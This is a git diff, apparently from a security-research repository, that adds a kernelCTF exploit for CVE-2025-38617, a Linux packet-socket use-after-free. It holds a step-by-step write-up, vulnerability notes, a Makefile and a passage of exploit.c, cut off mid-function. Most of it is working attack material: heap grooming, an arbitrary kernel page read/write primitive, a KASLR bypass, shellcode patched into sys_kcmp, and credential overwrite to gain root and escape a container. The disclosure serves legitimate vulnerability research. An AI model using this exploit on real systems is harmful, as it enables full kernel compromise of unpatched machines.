+From now on, we can `mmap(overflowed_pg_vec_packet_socket)` and perform reads and writes on the `leaked_content_simple_xattr` object. We will refer to the userspace memory that is currently used to manipulate the `leaked_content_simple_xattr` object as `manipulated_simple_xattr`.
+
+# abr_page_read_write_primitive
+We begin by destroying the `overflowed_simple_xattr` object. Now the red-black tree contains only the `leaked_content_simple_xattr` object.
+
+We need the addresses of two `PAGES_ORDER2_SIZE` pages:
+- One to fake a `struct simple_xattr` object. We will refer to this object as `fake_simple_xattr` and this object's address as `fake_simple_xattr_addr`.
+- One to fake `fake_simple_xattr->name`. We will refer to this object as `fake_simple_xattr_name` and this object's address as `fake_simple_xattr_name_addr`.
+
+#### The process of building `fake_simple_xattr_name` looks like:
+1. Create a packet socket. We will refer to this packet socket as `fake_simple_xattr_name_packet_socket`.
+2. 
Allocate a `struct simple_xattr` object with `setxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.leak_pages_order2_for_fake_simple_xattr_name", value, KMALLOC_8K_SIZE, XATTR_CREATE);`. We will refer to this object as `A`. `A` is allocated from the `PAGES_ORDER2_SIZE` pages freelist. `A` is on the same red-black tree as the `leaked_content_simple_xattr` object.
+3. Use `manipulated_simple_xattr` to leak the address of `A` => we have a `PAGES_ORDER2_SIZE` page address. Note: I chose the lazy path of looking for a pointer in `manipulated_simple_xattr->rb_node` instead of reading through the kernel code to work out the exact shape of the red-black tree.
+4. Destroy `A`.
+5. Use `fake_simple_xattr_name_packet_socket` to allocate a ring buffer with a single buffer of `PAGES_ORDER2_SIZE` to reclaim `A`.
+6. `mmap()` the ring buffer of `fake_simple_xattr_name_packet_socket` and write `"security.fake_simple_xattr_name"` to the buffer. Then `munmap()` the buffer.
+7. The process of validating whether we successfully reclaimed `A` looks like:
+    - Set `manipulated_simple_xattr->name = fake_simple_xattr_name_addr`.
+    - `ssize_t ret = getxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.fake_simple_xattr_name", value, manipulated_simple_xattr->size)`
+    - If `ret == manipulated_simple_xattr->size`, the reclamation succeeded.
+8. Set `manipulated_simple_xattr->name` back to the original value.
+9. If the reclamation did not succeed, we destroy the ring buffer and retry from step 2.
+
+#### The process of building `fake_simple_xattr` looks like:
+1. Create a packet socket. We will refer to this packet socket as `fake_simple_xattr_packet_socket`.
+2. Allocate a `struct simple_xattr` object with `setxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.leak_pages_order2_for_fake_simple_xattr", value, KMALLOC_8K_SIZE, XATTR_CREATE);`. We will refer to this object as `B`. `B` is allocated from the `PAGES_ORDER2_SIZE` pages freelist.
`B` is on the same red-black tree as the `leaked_content_simple_xattr` object.
+3. Use `manipulated_simple_xattr` to leak the address of `B` => we have a `PAGES_ORDER2_SIZE` page address. Keep track of whether the leaked address came from the `rb_right` node or the `rb_left` node.
+4. Destroy `B`.
+5. Use `fake_simple_xattr_packet_socket` to allocate a ring buffer with a single buffer of `PAGES_ORDER2_SIZE` to reclaim `B`.
+6. `mmap()` the ring buffer of `fake_simple_xattr_packet_socket` and write `"security.detect_fake_simple_xattr_reclaimation"` to the buffer.
+7. The process of validating whether we successfully reclaimed `B` looks like:
+    - Set `manipulated_simple_xattr->name = fake_simple_xattr_addr`.
+    - `ssize_t ret = getxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.detect_fake_simple_xattr_reclaimation", value, manipulated_simple_xattr->size)`
+    - If `ret == manipulated_simple_xattr->size`, the reclamation succeeded.
+8. Set `manipulated_simple_xattr->name` back to the original value.
+9. If the reclamation did not succeed, we destroy the ring buffer and retry from step 2.
+10. `memset()` the mmapped ring buffer to all zeros.
+11. Write a fake `struct simple_xattr` object to the mmapped ring buffer. The fake `struct simple_xattr` object looks like:
+```c
+struct simple_xattr *fake_simple_xattr = mem;
+fake_simple_xattr->rb_node.__rb_parent_color = leaked_content_simple_xattr_kernel_address;
+fake_simple_xattr->name = (char *)fake_simple_xattr_name_addr;
+fake_simple_xattr->size = KMALLOC_8K_SIZE;
+```
+
+12. In step 3, we kept track of whether the node is the right node or the left node. Now we can connect `fake_simple_xattr` to the red-black tree by doing:
+```c
+if (is_right_node) {
+    manipulated_simple_xattr->rb_node.rb_right = (void *)fake_simple_xattr_addr;
+} else {
+    manipulated_simple_xattr->rb_node.rb_left = (void *)fake_simple_xattr_addr;
+}
+```
+
+#### The process of overlapping a ring buffer with a buffer of another ring buffer looks like:
+1. 
Create a packet socket. We will refer to this packet socket as `overwritten_pg_vec_packet_socket`.
+2. Trigger `removexattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.fake_simple_xattr_name")`. Both `fake_simple_xattr_name_addr` and `fake_simple_xattr_addr` are freed.
+3. Use `overwritten_pg_vec_packet_socket` to allocate a ring buffer sized so that the allocation is served from the `PAGES_ORDER2_SIZE` pages freelist. The expectation is that the ring buffer will be allocated at either `fake_simple_xattr_name_addr` or `fake_simple_xattr_addr`.
+4. `mmap()` both `fake_simple_xattr_name_packet_socket` and `fake_simple_xattr_packet_socket`. Look for data that represents a ring buffer (one kernel address after another) to confirm the overlap.
+5. Now we have a `packet_socket_to_overwrite_pg_vec` and a `packet_socket_with_overwritten_pg_vec`.
+
+From now on, we can perform arbitrary page reads and writes with an implementation that looks like:
+```c
+void *abr_page_read_write_primitive_mmap(
+    struct abr_page_read_write_primitive *abr_page_read_write_primitive,
+    u64 page_aligned_addr_to_mmap
+)
+{
+    if (page_aligned_addr_to_mmap & (PAGE_SIZE - 1)) {
+        fprintf(stderr, "[abr_page_read_write_primitive_mmap]: page_aligned_addr_to_mmap is not page aligned\n");
+        return NULL;
+    }
+
+    void *mem = Mmap(
+        NULL,
+        abr_page_read_write_primitive->overwrite_pg_vec_mmap_size,
+        PROT_READ | PROT_WRITE,
+        MAP_SHARED,
+        abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec,
+        0
+    );
+
+    struct pgv *pgv = mem;
+    pgv[0].buffer = (char *)page_aligned_addr_to_mmap;
+    Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size);
+
+    mem = mmap(
+        NULL,
+        abr_page_read_write_primitive->overwritten_pg_vec_mmap_size,
+        PROT_READ | PROT_WRITE,
+        MAP_SHARED,
+        abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec,
+        0
+    );
+
+    if (mem == MAP_FAILED)
+        return NULL;
+
+    return mem;
+}
+```
+
+# Find kernel base
+The process of finding kernel base looks like:
+1. 
Create a pipe.
+2. Allocate a `struct simple_xattr` object with `setxattr(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH, "security.leaked_pages_order2_addr_for_pipe_buffer", value, KMALLOC_8K_SIZE, XATTR_CREATE);`. We will refer to this object as `C`. `C` is allocated from the `PAGES_ORDER2_SIZE` pages freelist. `C` is on the same red-black tree as the `leaked_content_simple_xattr` object.
+3. Use `manipulated_simple_xattr` to leak the address of `C` => we have a `PAGES_ORDER2_SIZE` page address. We will refer to this address as `pipe_buffer_addr`.
+4. Destroy `C`.
+5. Call `fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 * PAGE_SIZE)`. This eventually triggers the allocation of the `struct pipe_buffer` array from the `PAGES_ORDER2_SIZE` pages freelist.
+6. Write data to the pipe to populate a `struct pipe_buffer` object with useful content.
+7. Use `abr_page_read_write_primitive` to read `pipe_buffer_addr`. If the data looks like a `struct pipe_buffer` object, we use the `pipe_buffer->ops` pointer, which contains the address of `anon_pipe_buf_ops`, to calculate the kernel base and bypass KASLR.
+8. Close the pipe and retry the process if we did not find data that looks like a `struct pipe_buffer` object.
+
+Now we have the kernel base address. We continue by updating some useful kernel addresses.
+```c +u64 init_cred = 0x2c72ec0; +u64 init_fs = 0x2dad900; +u64 __x86_return_thunk = 0x14855d0; +u64 __do_sys_kcmp = 0x273d70; + +static inline void update_kernel_address(u64 kernel_base) +{ + init_cred += kernel_base; + init_fs += kernel_base; + __x86_return_thunk += kernel_base; + __do_sys_kcmp += kernel_base; +} +``` + +# Patch `sys_kcmp` +Use `abr_page_read_write_primitive` to patch `kcmp` system call handler with: +```c +extern void privilege_escalation_shellcode_begin(void); +extern void privilege_escalation_shellcode_end(void); + +__asm__( + ".intel_syntax noprefix;" + ".global privilege_escalation_shellcode_begin;" + ".global privilege_escalation_shellcode_end;" + + "privilege_escalation_shellcode_begin:\n" + + "mov rax,QWORD PTR gs:0x32380;" + "shl rdi, 32;" + "shl rsi, 32;" + "shr rsi, 32;" + "or rdi, rsi;" + "mov QWORD PTR [rax + 0x7c0], rdi;" + "mov QWORD PTR [rax + 0x7b8], rdi;" + "mov QWORD PTR [rax + 0x810], rcx;" + "jmp r8;" + + "privilege_escalation_shellcode_end:\n" + ".att_syntax;" +); +``` + +Every process running on Linux is represented by `struct task_struct` from kernel point of view. On the kernel that the exploit is running, these numbers represent: +- when kernel is handle system call, `gs:0x32380` contain pointer to the current process issues syscall +- 0x7c0: task_struct->cred offset +- 0x7b8: task_struct->real_cred offset +- 0x810: task_struct->fs offset + +# Privilege escalation +```c +int not_used = -1; +syscall(SYS_kcmp, (u32)(init_cred >> 32), (u32)(init_cred), not_used, init_fs, __x86_return_thunk); +``` + +This is roughly equivalent to: +```c +struct task_struct *exploit_task_struct = QWORD PTR gs:0x32380; +exploit_task_struct->cred = init_cred; +exploit_task_struct->real_cred = init_cred; +exploit_task_struct->fs = init_fs; // Instead of perform full container escape, set the mount namespace back to `init_fs` is enough to read the flag outside the container. 
+__x86_return_thunk;
+```
diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/vulnerability.md
new file mode 100644
index 000000000..f7352b68b
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/vulnerability.md
@@ -0,0 +1,24 @@
+# Vulnerability
+
+A race between `packet_set_ring()` and `packet_notifier()` allows the packet socket to re-register its hook on the network interface and receive packets sent to that interface while the ring buffer is being reconfigured. The receive path may then use the old ring buffer after it has been freed.
+
+## Requirements to trigger the vulnerability:
+- Capabilities: `CAP_NET_RAW` is required to trigger the vulnerability.
+- Kernel configuration: `CONFIG_PACKET` is required to trigger this vulnerability.
+- Are user namespaces needed?: Yes. This vulnerability requires `CAP_NET_RAW`, which is not usually granted to normal users, so we use an unprivileged user namespace to obtain it.
+
+## Commit which introduced the vulnerability
+- This vulnerability was introduced in Linux-2.6.12-rc2, with commit [ce06b03e60fc1](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ce06b03e60fc1)
+- This commit adds the head-drop FIFO queue to the kernel.
+
+## Commit which fixed the vulnerability
+- This vulnerability was fixed with commit [01d3c8417b9c1b884a8a981a3b886da556512f36](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=01d3c8417b9c1b884a8a981a3b886da556512f36)
+
+## Affected kernel versions
+- Linux versions 2.6.12 through 6.16 are affected by this vulnerability
+
+## Affected component, subsystem
+- Packet socket
+
+## Cause (UAF, BoF, race condition, double free, refcount overflow, etc)
+- UAF
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/Makefile b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/Makefile
new file mode 100644
index 000000000..e9e975869
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/Makefile
@@ -0,0 +1,32 @@
+# taken from: https://github.com/google/security-research/blob/1bb2f8c8d95a34cafe7861bc890cfba5d85ec141/pocs/linux/kernelctf/CVE-2024-0193_lts/exploit/lts-6.1.67/Makefile
+
+LIBMNL_DIR = $(realpath ./)/libmnl_build
+LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
+
+LIBS = -L$(LIBMNL_DIR)/install/lib -lmnl
+INCLUDES = -I$(LIBMNL_DIR)/libmnl-1.0.5/include
+CFLAGS = -static -Ofast
+
+exploit: exploit.c
+	gcc -o exploit exploit.c $(LIBS) $(INCLUDES) $(CFLAGS)
+
+
+prerequisites: libmnl-build
+
+libmnl-build : libmnl-download
+	tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc`
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
+
+
+libmnl-download :
+	mkdir $(LIBMNL_DIR)
+	wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2
+
+run:
+	./exploit
+
+clean:
+	rm -f exploit
+	rm -rf $(LIBMNL_DIR)
diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit
b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit new file mode 100644 index 000000000..dcc45722b Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c new file mode 100644 index 000000000..d08c9d8b4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c @@ -0,0 +1,2142 @@ +#include "exploit.h" + +void unix_error(const char *msg) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(errno)); + exit(EXIT_FAILURE); +} + +void Mnl_socket_error(const char *msg) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(errno)); + exit(EXIT_FAILURE); +} + +void Pthread_error(const char *msg, int error_code) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(error_code)); + exit(EXIT_FAILURE); +} + +void Unshare(int flags) +{ + if (unshare(flags) < 0) + unix_error("unshare"); +} + +int Socket(int domain, int type, int protocol) +{ + int fd = socket(domain, type, protocol); + if (fd < 0) + unix_error("socket"); + return fd; +} + +void Setsockopt(int fd, int level, int optname, const void *optval, socklen_t optlen) +{ + if (setsockopt(fd, level, optname, optval, optlen) < 0) + unix_error("setsockopt"); +} + +void Getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen) +{ + if (getsockopt(fd, level, optname, optval, optlen) < 0) + unix_error("getsockopt"); +} + +void Bind(int fd, const struct sockaddr *addr, socklen_t addrlen) +{ + if (bind(fd, addr, addrlen) < 0) + unix_error("bind"); +} + +void Ioctl(int fd, unsigned long request, unsigned long arg) +{ + if (ioctl(fd, request, arg) < 0) + unix_error("ioctl"); +} + +void Close(int fd) +{ + if (close(fd) < 0) + unix_error("close"); +} + +int Dup(int fd) +{ + int newfd = 
dup(fd); + if (newfd < 0) + unix_error("dup"); + return newfd; +} + +void Pipe2(int pipefd[2], int flags) +{ + if (pipe2(pipefd, flags) < 0) + unix_error("pipe2"); +} + +int Fcntl(int fd, int op, unsigned long arg) +{ + int ret = fcntl(fd, op, arg); + if (ret < 0) + unix_error("fcntl"); + return ret; +} + +void *Mmap(void *addr, size_t len, int prot, int flags, int fd, off_t offset) +{ + void *m = mmap(addr, len, prot, flags, fd, offset); + if (m == MAP_FAILED) + unix_error("mmap"); + return m; +} + +void Munmap(void *addr, size_t len) +{ + if (munmap(addr, len) < 0) + unix_error("munmap"); +} + +FILE *Fopen(const char *filename, const char *modes) +{ + FILE *f = fopen(filename, modes); + if (f == NULL) + unix_error("fopen"); + return f; +} + +void Fclose(FILE *stream) +{ + if (fclose(stream) != 0) + unix_error("fclose"); +} + +void *Calloc(size_t nmemb, size_t size) +{ + void *p = calloc(nmemb, size); + if (p == NULL) + unix_error("calloc"); + return p; +} + +ssize_t Sendmsg(int socket, const struct msghdr *message, int flags) +{ + ssize_t ret = sendmsg(socket, message, flags); + if (ret < 0) + unix_error("sendmsg"); + return ret; +} + +void Pthread_create(pthread_t *newthread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg) +{ + int ret = pthread_create(newthread, attr, start_routine, arg); + if (ret != 0) + Pthread_error("pthread_create", ret); +} + +void Pthread_join(pthread_t thread, void **retval) +{ + int ret = pthread_join(thread, retval); + if (ret != 0) + Pthread_error("pthread_join", ret); +} + +void Pthread_setaffinity_np(pthread_t thread, size_t cpusetsize, const cpu_set_t *cpuset) +{ + int ret = pthread_setaffinity_np(thread, cpusetsize, cpuset); + if (ret != 0) + Pthread_error("pthread_setaffinity_np", ret); +} + +void Getrlimit(int resource, struct rlimit *rlim) +{ + if (getrlimit(resource, rlim) < 0) + unix_error("getrlimit"); +} + +void Setrlimit(int resource, const struct rlimit *rlim) +{ + if (setrlimit(resource, rlim) < 
0) + unix_error("setrlimit"); +} + +void Setpriority(int which, id_t who, int value) +{ + if (setpriority(which, who, value) < 0) + unix_error("setpriority"); +} + +int Timerfd_create(int clockid, int flags) +{ + int timerfd = timerfd_create(clockid, flags); + if (timerfd < 0) + unix_error("timerfd_create"); + return timerfd; +} + +void Timerfd_settime(int fd, int flags, const struct itimerspec *new_value, struct itimerspec *old_value) +{ + if (timerfd_settime(fd, flags, new_value, old_value) < 0) + unix_error("timerfd_settime"); +} + +int Epoll_create1(int flags) +{ + int epfd = epoll_create1(flags); + if (epfd < 0) + unix_error("epoll_create1"); + return epfd; +} + +void Epoll_ctl(int epfd, int op, int fd, struct epoll_event *event) +{ + if (epoll_ctl(epfd, op, fd, event) < 0) + unix_error("epoll_ctl"); +} + +unsigned int If_nametoindex(const char *ifname) +{ + unsigned int ifindex = if_nametoindex(ifname); + if (ifindex == 0) + unix_error("if_nametoindex"); + return ifindex; +} + +void Mkdir(const char *pathname, mode_t mode) +{ + if (mkdir(pathname, mode) < 0) + unix_error("mkdir"); +} + +void Mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data) +{ + if (mount(source, target, filesystemtype, mountflags, data) < 0) + unix_error("mount"); +} + +int Open(const char *pathname, int flags, mode_t mode) +{ + int fd = open(pathname, flags, mode); + if (fd < 0) + unix_error("open"); + return fd; +} + +void Setxattr(const char *path, const char *name, const void *value, size_t size, int flags) +{ + if (setxattr(path, name, value, size, flags) < 0) + unix_error("setxattr"); +} + +ssize_t Getxattr(const char *path, const char *name, void *value, size_t size) +{ + ssize_t ret = getxattr(path, name, value, size); + if (ret < 0) + unix_error("getxattr"); + return ret; +} + +void Removexattr(const char *path, const char *name) +{ + if (removexattr(path, name) < 0) + unix_error("removexattr"); +} + +char 
*Strdup(const char *s) +{ + char *s1 = strdup(s); + if (s1 == NULL) + unix_error("strdup"); + return s1; +} + +ssize_t Read(int fd, void *buf, size_t count) +{ + ssize_t ret = read(fd, buf, count); + if (ret < 0) + unix_error("read"); + return ret; +} + +ssize_t Write(int fd, const void *buf, size_t count) +{ + ssize_t ret = write(fd, buf, count); + if (ret < 0) + unix_error("write"); + return ret; +} + +struct mnl_socket *Mnl_socket_open(int bus) +{ + struct mnl_socket *nl = mnl_socket_open(bus); + if (nl == NULL) + Mnl_socket_error("mnl_socket_open"); + return nl; +} + +void Mnl_socket_close(struct mnl_socket *nl) +{ + if (mnl_socket_close(nl) < 0) + Mnl_socket_error("mnl_socket_close"); +} + +void Mnl_socket_bind(struct mnl_socket *nl, unsigned int groups, pid_t pid) +{ + if (mnl_socket_bind(nl, groups, pid) < 0) + Mnl_socket_error("mnl_socket_bind"); +} + +ssize_t Mnl_socket_sendto(const struct mnl_socket *nl, const void *req, size_t size) +{ + ssize_t rc = mnl_socket_sendto(nl, req, size); + if (rc < 0) + Mnl_socket_error("mnl_socket_sendto"); + return rc; +} + +ssize_t Mnl_socket_recvfrom(const struct mnl_socket *nl, void *buf, size_t size) +{ + ssize_t rc = mnl_socket_recvfrom(nl, buf, size); + if (rc < 0) + Mnl_socket_error("mnl_socket_recvfrom"); + return rc; +} + +void validate_mnl_socket_operation_success(struct mnl_socket *nl, u32 seq) +{ + u8 buf[8192] = {}; + u32 portid = mnl_socket_get_portid(nl); + ssize_t ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + + while (ret > 0) { + ret = mnl_cb_run(buf, ret, seq, portid, NULL, NULL); + if (ret <= 0) + break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + + if (ret < 0) + exit(EXIT_FAILURE); +} + +void dummy_network_interface_create(const char *ifname, u32 mtu) +{ + struct mnl_socket *nl = Mnl_socket_open(NETLINK_ROUTE); + Mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID); + u32 seq = time(NULL); + u8 buf[8192] = {}; + + struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf); + nlh->nlmsg_type = 
RTM_NEWLINK; + nlh->nlmsg_seq = seq; + nlh->nlmsg_flags = NLM_F_ACK | NLM_F_REQUEST | NLM_F_CREATE; + + struct ifinfomsg *ifm = mnl_nlmsg_put_extra_header(nlh, sizeof(*ifm)); + mnl_attr_put_strz(nlh, IFLA_IFNAME, ifname); + mnl_attr_put_u32(nlh, IFLA_MTU, mtu); + + struct nlattr *linkinfo = mnl_attr_nest_start(nlh, IFLA_LINKINFO); + mnl_attr_put_strz(nlh, IFLA_INFO_KIND, "dummy"); + mnl_attr_nest_end(nlh, linkinfo); + + Mnl_socket_sendto(nl, nlh, nlh->nlmsg_len); + validate_mnl_socket_operation_success(nl, seq); + Mnl_socket_close(nl); +} + +void network_interface_up(int configure_socket_fd, const char *ifname) +{ + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + Ioctl(configure_socket_fd, SIOCGIFFLAGS, (unsigned long)&ifr); + + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + ifr.ifr_flags |= (IFF_UP | IFF_RUNNING); + Ioctl(configure_socket_fd, SIOCSIFFLAGS, (unsigned long)&ifr); +} + +void network_interface_down(int configure_socket_fd, const char *ifname) +{ + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + Ioctl(configure_socket_fd, SIOCGIFFLAGS, (unsigned long)&ifr); + + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + ifr.ifr_flags &= (~IFF_UP); + Ioctl(configure_socket_fd, SIOCSIFFLAGS, (unsigned long)&ifr); +} + +void pin_thread_on_cpu(int cpu) +{ + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(cpu, &cpuset); + + pthread_t current_thread = pthread_self(); + Pthread_setaffinity_np(current_thread, sizeof(cpu_set_t), &cpuset); +} + +void setup_namespace(void) +{ + int uid = getuid(); + int gid = getgid(); + + Unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS); + + FILE *f = NULL; + f = Fopen("/proc/self/uid_map", "w"); + fprintf(f, "0 %d 1\n", uid); + Fclose(f); + + f = Fopen("/proc/self/setgroups", "w"); + fprintf(f, "deny\n"); + Fclose(f); + + f = Fopen("/proc/self/gid_map", "w"); + fprintf(f, "0 %d 1\n", gid); + Fclose(f); +} + +void setup_tmpfs(void) +{ + Mkdir(TMPFS_MOUNT_POINT, 0644); + Mount("none", TMPFS_MOUNT_POINT, 
"tmpfs", 0, NULL); + create_file(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH); +} + +void setup_nofile_rlimit(void) +{ + struct rlimit nofile_rlimit = {}; + Getrlimit(RLIMIT_NOFILE, &nofile_rlimit); + nofile_rlimit.rlim_cur = nofile_rlimit.rlim_max; + Setrlimit(RLIMIT_NOFILE, &nofile_rlimit); +} + +void create_file(const char *path) +{ + int fd = Open(path, O_WRONLY | O_CREAT, 0644); + Close(fd); +} + +bool thread_in_sleep_state(int tid) +{ + if (tid == -1) + return false; + + char proc_path[4096] = {}; + char line_buffer[4096] = {}; + + snprintf(proc_path, sizeof(proc_path), "/proc/%d/stat", tid); + FILE *f = Fopen(proc_path, "r"); + + if (!fgets(line_buffer, sizeof(line_buffer), f)) { + Fclose(f); + return false; + } + + char *p = line_buffer; + int space_count = 0; + while (*p != '\0' && space_count != 2) { + if (*p == ' ') { + space_count++; + } + + p++; + } + + Fclose(f); + + if (*p == 'S' || *p == 'D') { + return true; + } + + return false; +} + +void alloc_pages(int packet_socket, unsigned page_count, unsigned page_size) +{ + struct tpacket_req tx_ring_req = {}; + tx_ring_req.tp_block_nr = page_count; + tx_ring_req.tp_block_size = page_size; + tx_ring_req.tp_frame_size = page_size; + tx_ring_req.tp_frame_nr = tx_ring_req.tp_block_size / tx_ring_req.tp_frame_size * tx_ring_req.tp_block_nr; + Setsockopt(packet_socket, SOL_PACKET, PACKET_TX_RING, &tx_ring_req, sizeof(tx_ring_req)); +} + +void free_pages(int packet_socket) +{ + struct tpacket_req tx_ring_req = {}; + Setsockopt(packet_socket, SOL_PACKET, PACKET_TX_RING, &tx_ring_req, sizeof(tx_ring_req)); +} + +struct victim_packet_socket_config *victim_packet_socket_config_create( + struct __kernel_sock_timeval sndtimeo, + struct sockaddr_ll addr, + struct tpacket_req3 tx_ring, + struct tpacket_req3 rx_ring, + int packet_loss, + int packet_version, + unsigned packet_reserve, + struct sock_filter filter[MAX_FILTER_LEN] +) +{ + struct victim_packet_socket_config *config = Calloc(1, sizeof(*config)); + 
config->sndtimeo = sndtimeo; + config->addr = addr; + config->tx_ring = tx_ring; + config->rx_ring = rx_ring; + config->packet_loss = packet_loss; + config->packet_version = packet_version; + config->packet_reserve = packet_reserve; + memcpy(config->filter, filter, MAX_FILTER_LEN * sizeof(struct sock_filter)); + return config; +} + +void victim_packet_socket_config_destroy(struct victim_packet_socket_config *config) +{ + free(config); +} + +struct victim_packet_socket *victim_packet_socket_create(struct victim_packet_socket_config *config) +{ + struct victim_packet_socket *v = Calloc(1, sizeof(*v)); + v->config = Calloc(1, sizeof(*v->config)); + memcpy(v->config, config, sizeof(struct victim_packet_socket_config)); + v->fd = Socket(AF_PACKET, SOCK_RAW, 0); + return v; +} + +void victim_packet_socket_destroy(struct victim_packet_socket *v) +{ + victim_packet_socket_config_destroy(v->config); + Close(v->fd); + free(v); +} + +void victim_packet_socket_configure(struct victim_packet_socket *v) +{ + struct victim_packet_socket_config *config = v->config; + Bind(v->fd, (const struct sockaddr *)&config->addr, sizeof(config->addr)); + Setsockopt(v->fd, SOL_SOCKET, SO_SNDTIMEO_NEW, &config->sndtimeo, sizeof(config->sndtimeo)); + Setsockopt(v->fd, SOL_PACKET, PACKET_LOSS, &config->packet_loss, sizeof(config->packet_loss)); + Setsockopt(v->fd, SOL_PACKET, PACKET_VERSION, &config->packet_version, sizeof(config->packet_version)); + Setsockopt(v->fd, SOL_PACKET, PACKET_RESERVE, &config->packet_reserve, sizeof(config->packet_reserve)); + Setsockopt(v->fd, SOL_PACKET, PACKET_RX_RING, &config->rx_ring, sizeof(config->rx_ring)); + Setsockopt(v->fd, SOL_PACKET, PACKET_TX_RING, &config->tx_ring, sizeof(config->tx_ring)); + struct sock_fprog fprog = { .filter = config->filter, .len = MAX_FILTER_LEN }; + Setsockopt(v->fd, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)); + + u64 tx_ring_size = (u64)config->tx_ring.tp_block_size * config->tx_ring.tp_block_nr; + u64 rx_ring_size = 
(u64)config->rx_ring.tp_block_size * config->rx_ring.tp_block_nr; + u64 ring_size = tx_ring_size + rx_ring_size; + void *ring = Mmap(NULL, ring_size, PROT_READ | PROT_WRITE, MAP_SHARED, v->fd, 0); + void *tx_ring = ring + rx_ring_size; + struct tpacket3_hdr *h = tx_ring; + h->tp_len = 1; + h->tp_status = TP_STATUS_SEND_REQUEST; + Munmap(ring, ring_size); +} + +struct simple_xattr_request *simple_xattr_request_create( + const char *filepath, + const char *name, + const char *value, + size_t value_size +) +{ + struct simple_xattr_request *request = Calloc(1, sizeof(*request)); + strncpy(request->filepath, filepath, PATH_MAX); + strncpy(request->name, name, XATTR_NAME_MAX); + request->value = Calloc(1, value_size); + memcpy(request->value, value, value_size); + request->value_size = value_size; + request->allocated = false; + return request; +} + +void simple_xattr_request_destroy(struct simple_xattr_request *request) +{ + free(request->value); + free(request); +} + +void *timerfd_waitlist_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct timerfd_waitlist_thread *t = arg; + t->tid = gettid(); + + Unshare(CLONE_FILES); + pthread_mutex_lock(&t->mutex); + t->unshare_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + + Close(STDIN_FILENO); + Close(STDOUT_FILENO); + + int epollfd = Epoll_create1(0); + + struct rlimit nofile_rlimit = {}; + Getrlimit(RLIMIT_NOFILE, &nofile_rlimit); + t->timerfds = Calloc(nofile_rlimit.rlim_cur, sizeof(*t->timerfds)); + t->timerfds[0] = t->timerfd; + t->total_timerfd = 1; + + for (int i = 1; i < (int)nofile_rlimit.rlim_cur; i++) { + t->timerfds[i] = dup(t->timerfds[0]); + if (t->timerfds[i] < 0) + break; + + t->total_timerfd++; + } + + t->epoll_events = Calloc(t->total_timerfd, sizeof(*t->epoll_events)); + for (int i = 0; i < t->total_timerfd; i++) { + t->epoll_events[i].data.fd = t->timerfds[i]; + t->epoll_events[i].events = EPOLLIN; + Epoll_ctl(epollfd, EPOLL_CTL_ADD, t->timerfds[i], 
